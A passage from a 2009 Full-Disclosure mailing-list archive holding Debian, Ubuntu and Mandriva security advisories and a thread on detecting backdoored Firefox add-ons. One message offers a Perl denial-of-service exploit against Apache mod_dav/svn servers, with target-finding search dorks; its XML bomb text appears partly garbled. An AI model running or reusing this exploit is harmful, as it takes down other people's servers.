08996d7a2ba0f2ff53abd41245b4f352 http://security.debian.org/pool/updates/main/c/cyrus-sasl2/libsasl2-modules_2.1.22.dfsg1-23+lenny1_sparc.deb Size/MD5 checksum: 137850 394ff90e509d13b822d5ed0cddc2ea27 http://security.debian.org/pool/updates/main/c/cyrus-sasl2/libsasl2-2_2.1.22.dfsg1-23+lenny1_sparc.deb Size/MD5 checksum: 102142 4739d9c336e9f8173147eb222353ff7a http://security.debian.org/pool/updates/main/c/cyrus-sasl2/libsasl2-modules-sql_2.1.22.dfsg1-23+lenny1_sparc.deb Size/MD5 checksum: 63600 39aa7cbabf1e395d297bc9636402f5a7 http://security.debian.org/pool/updates/main/c/cyrus-sasl2/libsasl2-modules-gssapi-mit_2.1.22.dfsg1-23+lenny1_sparc.deb Size/MD5 checksum: 62582 88bd4a20e17255314a5dd788bbb02f86 http://security.debian.org/pool/updates/main/c/cyrus-sasl2/libsasl2-dev_2.1.22.dfsg1-23+lenny1_sparc.deb Size/MD5 checksum: 261038 003e8ca005174a442e1271a04d6c885f http://security.debian.org/pool/updates/main/c/cyrus-sasl2/libsasl2-modules-ldap_2.1.22.dfsg1-23+lenny1_sparc.deb Size/MD5 checksum: 55826 1439ea1b2401eefd06cdd608a9559fa6 http://security.debian.org/pool/updates/main/c/cyrus-sasl2-heimdal/libsasl2-modules-gssapi-heimdal_2.1.22.dfsg1-23+lenny1_sparc.deb Size/MD5 checksum: 62976 6c75a70e425e2032975c46634c404591 http://security.debian.org/pool/updates/main/c/cyrus-sasl2-heimdal/cyrus-sasl2-heimdal-dbg_2.1.22.dfsg1-23+lenny1_sparc.deb Size/MD5 checksum: 65428 9b2b3189c39972e611bc180fd5aa6ba1 http://security.debian.org/pool/updates/main/c/cyrus-sasl2/cyrus-sasl2-dbg_2.1.22.dfsg1-23+lenny1_sparc.deb Size/MD5 checksum: 535118 407f26e926701d7a0008522aa5da27bb http://security.debian.org/pool/updates/main/c/cyrus-sasl2/libsasl2-modules-otp_2.1.22.dfsg1-23+lenny1_sparc.deb Size/MD5 checksum: 74926 f2b2c0957166e2196404efbbf9413bfb These files will probably be moved into the stable distribution on its next update. - --------------------------------------------------------------------------------- For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce at lists.debian.org Package info: `apt-cache show ' and http://packages.debian.org/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iEYEARECAAYFAkojzKIACgkQHYflSXNkfP8X4QCdFIZfAWStsWeHaU/VPvslWafO cOQAniJfVdsiGmjL2V+VHffEeQJF5j5A =SHqc -----END PGP SIGNATURE----- From Valdis.Kletnieks at vt.edu Mon Jun 1 16:37:22 2009 From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu) Date: Mon, 01 Jun 2009 11:37:22 -0400 Subject: [Full-disclosure] Is FFSpy a hoax? In-Reply-To: Your message of "Sat, 30 May 2009 12:31:03 +0530." References: Message-ID: <46917.1243870642@turing-police.cc.vt.edu> On Sat, 30 May 2009 12:31:03 +0530, FFSpy Buster said: > He suggests that Firefox must do something to notify the user when an addon > has been compromised by a remote attacker. He agrees that the remote > attacker has to gain physical or local access of the system by remotely > logging in or something. I wouldn't rank it as a major panic, but it *is* pointing out an interesting and little-considered place for an attacker who has gotten access to leave a back door for themselves. Most security books will tell you to check places like 'crontab', and I've seen backdoors and other attacks hidden in .vimrc and .gdbinit files, but don't mention browser plugins and add-ons. This is a bit more nefarious because the API and packaging of Firefox add-ons isn't well understood by most people, so it's hard to tell where exactly to look, and for what. > Let us say the attacker ssh-ed or telnet-ed into > the user's PC and modified an addon. What measures can Firefox take to > notify the user of the modification? > > I can't imagine of any because if it is digital signature or checksum based, > the attacker can very well modify the public key or the checksum in > Firefox's store. So, this whole FFSpy thing sounds like a hoax to me, an > unnecessary panic being created by Duarte Silva. Please correct me, if I am > wrong. The trick is to take the signature/checksum and store it someplace that isn't writable by the user. For instance, the venerable Tripwire or the more recent Aide will be able to detect this sort of attack - and if you're really paranoid and store the Tripwire keys and database offline (cd-rom or USB key, etc), it will even be able to work if the system gets compromised (booting off known clean media needed for this one, of course). -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 226 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090601/65ab78d2/attachment.bin From jamie at canonical.com Mon Jun 1 19:21:09 2009 From: jamie at canonical.com (Jamie Strandboge) Date: Mon, 1 Jun 2009 13:21:09 -0500 Subject: [Full-disclosure] [USN-778-1] cron vulnerability Message-ID: <20090601182109.GB19716@severus.strandboge.com> =========================================================== Ubuntu Security Notice USN-778-1 June 01, 2009 cron vulnerability CVE-2006-2607 =========================================================== A security issue affects the following Ubuntu releases: Ubuntu 6.06 LTS Ubuntu 8.04 LTS Ubuntu 8.10 Ubuntu 9.04 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 6.06 LTS: cron 3.0pl1-92ubuntu1.1 Ubuntu 8.04 LTS: cron 3.0pl1-100ubuntu2.1 Ubuntu 8.10: cron 3.0pl1-104+ubuntu5.1 Ubuntu 9.04: cron 3.0pl1-105ubuntu1.1 In general, a standard system upgrade is sufficient to effect the necessary changes. Details follow: It was discovered that cron did not properly check the return code of the setgid() and initgroups() system calls. A local attacker could use this to escalate group privileges. Please note that cron versions 3.0pl1-64 and later were already patched to address the more serious setuid() check referred to by CVE-2006-2607. Updated packages for Ubuntu 6.06 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/c/cron/cron_3.0pl1-92ubuntu1.1.diff.gz Size/MD5: 49957 be99a97742618d1ee98841b007261478 http://security.ubuntu.com/ubuntu/pool/main/c/cron/cron_3.0pl1-92ubuntu1.1.dsc Size/MD5: 693 90bd74d44d50f316995ce641b5c1748f http://security.ubuntu.com/ubuntu/pool/main/c/cron/cron_3.0pl1.orig.tar.gz Size/MD5: 59245 4c64aece846f8483daf440f8e3dd210f amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/c/cron/cron_3.0pl1-92ubuntu1.1_amd64.deb Size/MD5: 66132 3c3567e4041ca920f58aff3ec370785e i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/c/cron/cron_3.0pl1-92ubuntu1.1_i386.deb Size/MD5: 60362 a4f44b8d8c9781053d8f545ebcde2011 powerpc architecture (Apple Macintosh G3/G4/G5): http://security.ubuntu.com/ubuntu/pool/main/c/cron/cron_3.0pl1-92ubuntu1.1_powerpc.deb Size/MD5: 69354 b1c666c74fd2711fb0f942d57326333b sparc architecture (Sun SPARC/UltraSPARC): http://security.ubuntu.com/ubuntu/pool/main/c/cron/cron_3.0pl1-92ubuntu1.1_sparc.deb Size/MD5: 61404 7bb09fbd5e5a2c8f479b2cb5296b6053 Updated packages for Ubuntu 8.04 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/c/cron/cron_3.0pl1-100ubuntu2.1.diff.gz Size/MD5: 67887 a5af279d0b7acafd0d885707e2301a97 http://security.ubuntu.com/ubuntu/pool/main/c/cron/cron_3.0pl1-100ubuntu2.1.dsc Size/MD5: 795 3680f051b5bbaa54252da7d92f10f232 http://security.ubuntu.com/ubuntu/pool/main/c/cron/cron_3.0pl1.orig.tar.gz Size/MD5: 59245 4c64aece846f8483daf440f8e3dd210f amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/c/cron/cron_3.0pl1-100ubuntu2.1_amd64.deb Size/MD5: 83894 72449a38f5c3ce3b3716e386a1d1fd2f i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/c/cron/cron_3.0pl1-100ubuntu2.1_i386.deb Size/MD5: 79432 240d6d01e1d33d9d606c19780571b0d6 lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/c/cron/cron_3.0pl1-100ubuntu2.1_lpia.deb Size/MD5: 78234 ec5c95520d9e3e94a572c8095e976f0b powerpc architecture (Apple Macintosh G3/G4/G5): http://ports.ubuntu.com/pool/main/c/cron/cron_3.0pl1-100ubuntu2.1_powerpc.deb Size/MD5: 91154 5a110f1e1094522323f5773f39b10c93 sparc architecture (Sun SPARC/UltraSPARC): http://ports.ubuntu.com/pool/main/c/cron/cron_3.0pl1-100ubuntu2.1_sparc.deb Size/MD5: 81388 6f546235162b4c89bc247453418fadfa Updated packages for Ubuntu 8.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/c/cron/cron_3.0pl1-104+ubuntu5.1.diff.gz Size/MD5: 69691 5dc135e1d9ffa07bf88a0d11cafad393 http://security.ubuntu.com/ubuntu/pool/main/c/cron/cron_3.0pl1-104+ubuntu5.1.dsc Size/MD5: 1189 650b8107492613cab5713a594b3662e7 http://security.ubuntu.com/ubuntu/pool/main/c/cron/cron_3.0pl1.orig.tar.gz Size/MD5: 59245 4c64aece846f8483daf440f8e3dd210f amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/c/cron/cron_3.0pl1-104+ubuntu5.1_amd64.deb Size/MD5: 88220 889eec9f40f176e3eca03961b2eb6c02 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/c/cron/cron_3.0pl1-104+ubuntu5.1_i386.deb Size/MD5: 83228 40aaf042c987c54d18d2dda7bd1d9b6c lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/c/cron/cron_3.0pl1-104+ubuntu5.1_lpia.deb Size/MD5: 81730 480f1d0080ba57093ad5ea831e0eb408 powerpc architecture (Apple Macintosh G3/G4/G5): http://ports.ubuntu.com/pool/main/c/cron/cron_3.0pl1-104+ubuntu5.1_powerpc.deb Size/MD5: 91906 92ede863ffb9ee89e95d0f0a736d6677 sparc architecture (Sun SPARC/UltraSPARC): http://ports.ubuntu.com/pool/main/c/cron/cron_3.0pl1-104+ubuntu5.1_sparc.deb Size/MD5: 86018 98da4980996f8f0a09759ded88cd0f6d Updated packages for Ubuntu 9.04: Source archives: http://security.ubuntu.com/ubuntu/pool/main/c/cron/cron_3.0pl1-105ubuntu1.1.diff.gz Size/MD5: 70384 eb0ce0dd8aab4df19f1e499ac10436b8 http://security.ubuntu.com/ubuntu/pool/main/c/cron/cron_3.0pl1-105ubuntu1.1.dsc Size/MD5: 1185 d1b008b50afc357bedbfbc0b8980c547 http://security.ubuntu.com/ubuntu/pool/main/c/cron/cron_3.0pl1.orig.tar.gz Size/MD5: 59245 4c64aece846f8483daf440f8e3dd210f amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/c/cron/cron_3.0pl1-105ubuntu1.1_amd64.deb Size/MD5: 89016 3d8f8e87c84ac90fdf2c89556656ce32 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/c/cron/cron_3.0pl1-105ubuntu1.1_i386.deb Size/MD5: 83898 109b7ff37a0f60977448a59571bf0493 lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/c/cron/cron_3.0pl1-105ubuntu1.1_lpia.deb Size/MD5: 82642 e74dfc0bf984db836b34aa19a64b8a24 powerpc architecture (Apple Macintosh G3/G4/G5): http://ports.ubuntu.com/pool/main/c/cron/cron_3.0pl1-105ubuntu1.1_powerpc.deb Size/MD5: 92660 fc4bb8046c76e905a4f05461af635a50 sparc architecture (Sun SPARC/UltraSPARC): http://ports.ubuntu.com/pool/main/c/cron/cron_3.0pl1-105ubuntu1.1_sparc.deb Size/MD5: 86816 1594345cabfc8957565cc5f771eb1f57 -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 197 bytes Desc: Digital signature Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090601/6d3434d0/attachment.bin From kcope2 at googlemail.com Mon Jun 1 21:46:20 2009 From: kcope2 at googlemail.com (Kingcope) Date: Mon, 1 Jun 2009 22:46:20 +0200 Subject: [Full-disclosure] The father of all bombs - another webdav fiasco Message-ID: <72f8221d0906011346u4a52ba18ye951ebae3b056774@mail.gmail.com> Apache mod_dav / svn Remote Denial of Service Exploit Google Dorks: inurl:svn inurl:trunk "powered by subversion version" Information on the bug (XML Bomb): http://blog.didierstevens.com/2008/09/23/dismantling-an-xml-bomb/ Enjoy! ------------------------------------------------------------------- ###apache-ied.pl ### Apache mod_dav / svn Remote Denial of Service Exploit ### by kcope / June 2009 ### ### Will exhaust all system memory ### Needs Authentication on normal DAV ### ### This can be especially serious stuff when used against ### svn (subversion) servers!! Svn might let the PROPFIND slip through ### without authentication. bwhahaaha :o) ### use at your own risk! ################################################################## use IO::Socket; use MIME::Base64; sub usage { print "Apache mod_dav / svn Remote Denial of Service Exploit\n"; print "by kcope in 2009\n"; print "usage: perl apache-ied.pl [username] [password]\n"; print "example: perl apache-ied.pl svn.XXX.com /projects/\n";exit; } if ($#ARGV < 1) {usage();} $hostname = $ARGV[0]; $webdavfile = $ARGV[1]; $username = $ARGV[2]; $password = $ARGV[3]; $|=1; $BasicAuth = encode_base64("$username:$password"); chomp $BasicAuth; my $sock = IO::Socket::INET->new(PeerAddr => $hostname, PeerPort => 80, Proto => 'tcp'); print $sock "PROPFIND $webdavfile HTTP/1.1\r\n"; print $sock "Host: $hostname\r\n"; print $sock "Depth: 0\r\n"; print $sock "Connection: close\r\n"; if ($username ne "") { print $sock "Authorization: Basic $BasicAuth\r\n"; } print $sock "\r\n"; $x = <$sock>; print $x; if (!($x =~ /207/)) { while(<$sock>) { print; } close($sock); print "No PROPFIND on this server and path.\n"; exit(0); } $a = ""; for ($i=1;$i<256;$i++) { # Here you can increase the XML bomb count $k = $i-1; $a .= "\n" } $igzml = "\n" ."\n" ."\n" .$a ."]>\n" ."\n" ."&x$k;\n" ."\n"; print "Apache mod_dav / svn Remote Denial of Service Exploit\n"; print "by kcope in 2009\n"; print "Launching DoS Attack...\n"; $ExploitRequest = "PROPFIND $webdavfile HTTP/1.1\r\n" ."Host: $hostname\r\n" ."Depth: 0\r\n"; if ($username ne "") { $ExploitRequest .= "Authorization: Basic $BasicAuth\r\n"; } $ExploitRequest .= "Content-Type: text/xml\r\nContent-Length: ".length($igzml)."\r\n\r\n" . $igzml; while(1) { again: my $sock = IO::Socket::INET->new(PeerAddr => $hostname, PeerPort => 80, Proto => 'tcp') || (goto again); print $sock $ExploitRequest; print ";Pp"; } From security at mandriva.com Tue Jun 2 00:15:00 2009 From: security at mandriva.com (security at mandriva.com) Date: Tue, 02 Jun 2009 01:15:00 +0200 Subject: [Full-disclosure] [ MDVSA-2009:126 ] eggdrop Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDVSA-2009:126 http://www.mandriva.com/security/ _______________________________________________________________________ Package : eggdrop Date : June 1, 2009 Affected: 2008.1, 2009.0, 2009.1, Corporate 3.0 _______________________________________________________________________ Problem Description: mod/server.mod/servmsg.c in Eggheads Eggdrop and Windrop 1.6.19 and earlier allows remote attackers to cause a denial of service (crash) via a crafted PRIVMSG that causes an empty string to trigger a negative string length copy. NOTE: this issue exists because of an incorrect fix for CVE-2007-2807 (CVE-2009-1789). _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1789 _______________________________________________________________________ Updated Packages: Mandriva Linux 2008.1: cc805ed693bd02aa5d20b1a7743231a3 2008.1/i586/eggdrop-1.6.18-5.1mdv2008.1.i586.rpm 82ed73d46c5f43cce66ab1ca822a3de6 2008.1/SRPMS/eggdrop-1.6.18-5.1mdv2008.1.src.rpm Mandriva Linux 2008.1/X86_64: e0bc2b8e6bf113e3fd1ca90478c46b91 2008.1/x86_64/eggdrop-1.6.18-5.1mdv2008.1.x86_64.rpm 82ed73d46c5f43cce66ab1ca822a3de6 2008.1/SRPMS/eggdrop-1.6.18-5.1mdv2008.1.src.rpm Mandriva Linux 2009.0: 779c10d0cb61fab2777d7faa7648b22e 2009.0/i586/eggdrop-1.6.19-2.1mdv2009.0.i586.rpm d1cca08f9930bbfe6c54c0433495105d 2009.0/SRPMS/eggdrop-1.6.19-2.1mdv2009.0.src.rpm Mandriva Linux 2009.0/X86_64: cd9215461dee9c0f628531a75595f9fd 2009.0/x86_64/eggdrop-1.6.19-2.1mdv2009.0.x86_64.rpm d1cca08f9930bbfe6c54c0433495105d 2009.0/SRPMS/eggdrop-1.6.19-2.1mdv2009.0.src.rpm Mandriva Linux 2009.1: 6a46846372e2a1df2261dcc1f03192d1 2009.1/i586/eggdrop-1.6.19-3.1mdv2009.1.i586.rpm c9692b23909736c4ab591366f0e9866f 2009.1/SRPMS/eggdrop-1.6.19-3.1mdv2009.1.src.rpm Mandriva Linux 2009.1/X86_64: 0d62d2fd40a927b7a4bd39bb5a84a718 2009.1/x86_64/eggdrop-1.6.19-3.1mdv2009.1.x86_64.rpm c9692b23909736c4ab591366f0e9866f 2009.1/SRPMS/eggdrop-1.6.19-3.1mdv2009.1.src.rpm Corporate 3.0: 64d17abb0b6eb47c8d79675b88462e59 corporate/3.0/i586/eggdrop-1.6.15-3.2.C30mdk.i586.rpm 0c717fd83e2ed782bfbd1ec16b11250c corporate/3.0/SRPMS/eggdrop-1.6.15-3.2.C30mdk.src.rpm Corporate 3.0/X86_64: ba29bd8f14eaadeab7727ee7aea14b86 corporate/3.0/x86_64/eggdrop-1.6.15-3.2.C30mdk.x86_64.rpm 0c717fd83e2ed782bfbd1ec16b11250c corporate/3.0/SRPMS/eggdrop-1.6.15-3.2.C30mdk.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFKJDQcmqjQ0CJFipgRAk9uAJwNSeQEt+bZ6lG8jqZnFnbR3GzeagCfZjc1 ZtU2kEWR5EtsEmT7q5pNKz0= =MnwW -----END PGP SIGNATURE----- From tbiehn at gmail.com Tue Jun 2 04:05:02 2009 From: tbiehn at gmail.com (T Biehn) Date: Mon, 1 Jun 2009 23:05:02 -0400 Subject: [Full-disclosure] Is FFSpy a hoax? In-Reply-To: <46917.1243870642@turing-police.cc.vt.edu> References: <46917.1243870642@turing-police.cc.vt.edu> Message-ID: <2d6724810906012005r2542dda6kf548bc2fd4eaf063@mail.gmail.com> Consider a defense within the realm of possibility: On install firefox requests that the user enter an identifier. This identifier is presented to the user in the top bar of his browser window. Firefox 'locks' all script files while it is on. Firefox self-encrypts to the one-way-hash of the files. A user will know they have been compromised because the identifier cannot match if firefox.exe has been replaced by another version that supersedes the checks if the identifier is stored as part of the encrypted program stub. Firefox can lock the script files while it is open. It can update scripts because it owns the locks and then can re-encrypt itself at this time to match the new hash. Consider the possible attacks of such a defense: This is susceptible to attacks on memory (injection to trigger an update, overriding the update mechanism, trivial to read the identifier to clone behavior). Is there an extension to this idea that can protect against this? Perhaps this method in-situ with a memory protection mechanism of some sort. Why: Only a checking process that runs in an isolated read-only manner would be sufficient to protect against such attacks. There are ways to cat and mouse this problem but without a watchdog process that isn't user-writable a tenable solution cannot be found. Can this be applied to other possible defenses? A clever algorithm can always be beaten by another clever algorithm. What about other situations of this kind? Consider also that it is just as likely, if not more so, that a virus author would instead chose to write stubs to all binary files that show up in either init scripts, cron, automatic services in windows (hell you can patch svchost dlls), the start menu, explorer.exe, the kernel, drivers, etc etc. ............................ The real point here is a system that is difficult to compromise in the first place, and that is encapsulated by many such systems that are regularly rebuilt, is the only current defense. An attacker slowly gains leverage over a system or system of systems, once gaining access it is almost impossible to lock out and / or defend given an adequately skilled adversary. The solution becomes clear, build innumerable artificial obstacles. All articles of advisories of this sort are masturbatory in nature. -Travis On Mon, Jun 1, 2009 at 11:37 AM, wrote: > On Sat, 30 May 2009 12:31:03 +0530, FFSpy Buster said: > >> He suggests that Firefox must do something to notify the user when an addon >> has been compromised by a remote attacker. He agrees that the remote >> attacker has to gain physical or local access of the system by remotely >> logging in or something. > > I wouldn't rank it as a major panic, but it *is* pointing out an interesting > and little-considered place for an attacker who has gotten access to leave a > back door for themselves. Most security books will tell you to check places > like 'crontab', and I've seen backdoors and other attacks hidden in .vimrc and > .gdbinit files, but don't mention browser plugins and add-ons. ?This is a bit > more nefarious because the API and packaging of Firefox add-ons isn't well > understood by most people, so it's hard to tell where exactly to look, and for > what. > >> ? ? ? ? ? ? ? ? ? ? ? ? ? ?Let us say the attacker ssh-ed or telnet-ed into >> the user's PC and modified an addon. What measures can Firefox take to >> notify the user of the modification? >> >> I can't imagine of any because if it is digital signature or checksum based, >> the attacker can very well modify the public key or the checksum in >> Firefox's store. So, this whole FFSpy thing sounds like a hoax to me, an >> unnecessary panic being created by Duarte Silva. Please correct me, if I am >> wrong. > > The trick is to take the signature/checksum and store it someplace that > isn't writable by the user. ?For instance, the venerable Tripwire or the > more recent Aide will be able to detect this sort of attack - and if you're > really paranoid and store the Tripwire keys and database offline (cd-rom or > USB key, etc), it will even be able to work if the system gets compromised > (booting off known clean media needed for this one, of course). > > > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > From Valdis.Kletnieks at vt.edu Tue Jun 2 04:46:49 2009 From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu) Date: Mon, 01 Jun 2009 23:46:49 -0400 Subject: [Full-disclosure] Is FFSpy a hoax? In-Reply-To: Your message of "Mon, 01 Jun 2009 23:05:02 EDT." <2d6724810906012005r2542dda6kf548bc2fd4eaf063@mail.gmail.com> References: <46917.1243870642@turing-police.cc.vt.edu> <2d6724810906012005r2542dda6kf548bc2fd4eaf063@mail.gmail.com> Message-ID: <96136.1243914409@turing-police.cc.vt.edu> On Mon, 01 Jun 2009 23:05:02 EDT, T Biehn said: > Consider a defense within the realm of possibility: > On install firefox requests that the user enter an identifier. This > identifier is presented to the user in the top bar of his browser > window. Firefox 'locks' all script files while it is on. > Firefox self-encrypts to the one-way-hash of the files. > A user will know they have been compromised because the identifier > cannot match if firefox.exe has been replaced by another version that > supersedes the checks if the identifier is stored as part of the > encrypted program stub. Several problems here: 1) Self-encrypting to the one-way-hash doesn't solve the problem - an attacker can decrypt the stored file, extract the identifier, and then save the backdoored file encrypted to the new hash, identifier and all. (Hint - this is exactly what you'd have to do on a *legitimate* update of an extension...) 2) And in fact, encrypting to the expected hash value doesn't actually do much for you - if I know the expected hash value is 0x349F3D, I can just use that to store an encrypted backdoored file whose hash in fact *isn't* 0x349F3D. Now, *once retrieved*, you probably should re-check the hash of the retrieved file, and make sure it is still 0x349F3D - but at that point, the crypting is pointless, as all you care about is the before/after hashes of the plaintext. Now finding a secure way to store that "before" hash - *that's* the hard part (in general, you can't store it anyplace the user can write to, which makes a legitimate update "interesting") 3) The usual warnings about using a good crypto-strength hash function apply. I haven't seen a break for MD5 that allows colliding to a pre-determined hash yet. The key word here is "yet". ;) 4) You'd probably have to decide between having one master identifier which would piss off users and break every time Firefox or any extension released a patch, or having one identifier per extension, and piss off users who can't remember all the identifiers... 5) A small UI real estate problem - at least on my Linux box, Firefox is already using the window titlebar to display the tag from the page. I suspect that users still want that behavior, so you need to find a way to co-exist with that. But heck, if Firefox Minefield builds can stick a build ID onto the titlebar, what's another 10-15 chars? ;) -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 226 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090601/665f295d/attachment.bin From mvilas at gmail.com Tue Jun 2 05:08:39 2009 From: mvilas at gmail.com (Mario Alejandro Vilas Jerez) Date: Tue, 2 Jun 2009 01:08:39 -0300 Subject: [Full-disclosure] Is FFSpy a hoax? Message-ID: <3fbf862f0906012108w1beebc23y2d2186ff490bcc3@mail.gmail.com> Argh, wrong subject, damn it :P Let's try again: On Tue, Jun 2, 2009 at 1:07 AM, Mario Alejandro Vilas Jerez < mvilas at gmail.com> wrote: > Maybe this is a stupid question, but why not just requiring sudo to install > addons? Then the addons could be stored along with the program files. That > could require making the addons global rather than per-user, but I don't see > that as a major problem - besides it can be avoided too by having a per-user > list of addons to load. I believe a similar solution can be implemented for > Windows. > > >> Consider a defense within the realm of possibility: >> On install firefox requests that the user enter an identifier. This >> identifier is presented to the user in the top bar of his browser >> window. Firefox 'locks' all script files while it is on. >> >> Firefox self-encrypts to the one-way-hash of the files. >> A user will know they have been compromised because the identifier >> cannot match if firefox.exe has been replaced by another version that >> supersedes the checks if the identifier is stored as part of the >> >> encrypted program stub. >> >> Firefox can lock the script files while it is open. It can update >> scripts because it owns the locks and then can re-encrypt itself at >> this time to match the new hash. >> >> Consider the possible attacks of such a defense: >> >> This is susceptible to attacks on memory (injection to trigger an >> update, overriding the update mechanism, trivial to read the >> identifier to clone behavior). Is there an extension to this idea that >> can protect against this? Perhaps this method in-situ with a memory >> >> protection mechanism of some sort. >> >> Why: >> Only a checking process that runs in an isolated read-only manner >> would be sufficient to protect against such attacks. There are ways to >> cat and mouse this problem but without a watchdog process that isn't >> >> user-writable a tenable solution cannot be found. >> >> Can this be applied to other possible defenses? >> A clever algorithm can always be beaten by another clever algorithm. >> >> What about other situations of this kind? >> >> Consider also that it is just as likely, if not more so, that a virus >> author would instead chose to write stubs to all binary files that >> show up in either init scripts, cron, automatic services in windows >> (hell you can patch svchost dlls), the start menu, explorer.exe, the >> >> kernel, drivers, etc etc. >> >> ............................ >> The real point here is a system that is difficult to compromise in the >> first place, and that is encapsulated by many such systems that are >> regularly rebuilt, is the only current defense. An attacker slowly >> >> gains leverage over a system or system of systems, once gaining access >> it is almost impossible to lock out and / or defend given an >> adequately skilled adversary. >> >> The solution becomes clear, build innumerable artificial obstacles. >> >> All articles of advisories of this sort are masturbatory in nature. >> >> -Travis >> >> > -- > HONEY: I want to? put some powder on my nose. > GEORGE: Martha, won?t you show her where we keep the euphemism? > -- HONEY: I want to? put some powder on my nose. GEORGE: Martha, won?t you show her where we keep the euphemism? -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090602/ba42ba0a/attachment.html From mvilas at gmail.com Tue Jun 2 05:07:43 2009 From: mvilas at gmail.com (Mario Alejandro Vilas Jerez) Date: Tue, 2 Jun 2009 01:07:43 -0300 Subject: [Full-disclosure] The father of all bombs - another webdav fiasco In-Reply-To: <72f8221d0906011346u4a52ba18ye951ebae3b056774@mail.gmail.com> References: <72f8221d0906011346u4a52ba18ye951ebae3b056774@mail.gmail.com> Message-ID: <3fbf862f0906012107v6901863nc6e23d9136bb99c7@mail.gmail.com> Maybe this is a stupid question, but why not just requiring sudo to install addons? Then the addons could be stored along with the program files. That could require making the addons global rather than per-user, but I don't see that as a major problem - besides it can be avoided too by having a per-user list of addons to load. I believe a similar solution can be implemented for Windows. > Consider a defense within the realm of possibility: > On install firefox requests that the user enter an identifier. This > identifier is presented to the user in the top bar of his browser > window. Firefox 'locks' all script files while it is on. > Firefox self-encrypts to the one-way-hash of the files. > A user will know they have been compromised because the identifier > cannot match if firefox.exe has been replaced by another version that > supersedes the checks if the identifier is stored as part of the > encrypted program stub. > > Firefox can lock the script files while it is open. It can update > scripts because it owns the locks and then can re-encrypt itself at > this time to match the new hash. > > Consider the possible attacks of such a defense: > This is susceptible to attacks on memory (injection to trigger an > update, overriding the update mechanism, trivial to read the > identifier to clone behavior). Is there an extension to this idea that > can protect against this? Perhaps this method in-situ with a memory > protection mechanism of some sort. > > Why: > Only a checking process that runs in an isolated read-only manner > would be sufficient to protect against such attacks. There are ways to > cat and mouse this problem but without a watchdog process that isn't > user-writable a tenable solution cannot be found. > > Can this be applied to other possible defenses? > A clever algorithm can always be beaten by another clever algorithm. > > What about other situations of this kind? > Consider also that it is just as likely, if not more so, that a virus > author would instead chose to write stubs to all binary files that > show up in either init scripts, cron, automatic services in windows > (hell you can patch svchost dlls), the start menu, explorer.exe, the > kernel, drivers, etc etc. > > ............................ > The real point here is a system that is difficult to compromise in the > first place, and that is encapsulated by many such systems that are > regularly rebuilt, is the only current defense. An attacker slowly > gains leverage over a system or system of systems, once gaining access > it is almost impossible to lock out and / or defend given an > adequately skilled adversary. > > The solution becomes clear, build innumerable artificial obstacles. > > All articles of advisories of this sort are masturbatory in nature. > > -Travis > > -- HONEY: I want to? put some powder on my nose. GEORGE: Martha, won?t you show her where we keep the euphemism? -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090602/4cc61e28/attachment.html From mvilas at gmail.com Tue Jun 2 05:09:49 2009 From: mvilas at gmail.com (Mario Alejandro Vilas Jerez) Date: Tue, 2 Jun 2009 01:09:49 -0300 Subject: [Full-disclosure] Is FFSpy a hoax? In-Reply-To: <3fbf862f0906012108w1beebc23y2d2186ff490bcc3@mail.gmail.com> References: <3fbf862f0906012108w1beebc23y2d2186ff490bcc3@mail.gmail.com> Message-ID: <3fbf862f0906012109od320891x9e4087cbd5eab0a@mail.gmail.com> Argh, wrong subject, damn it :P Let's try again: > On Tue, Jun 2, 2009 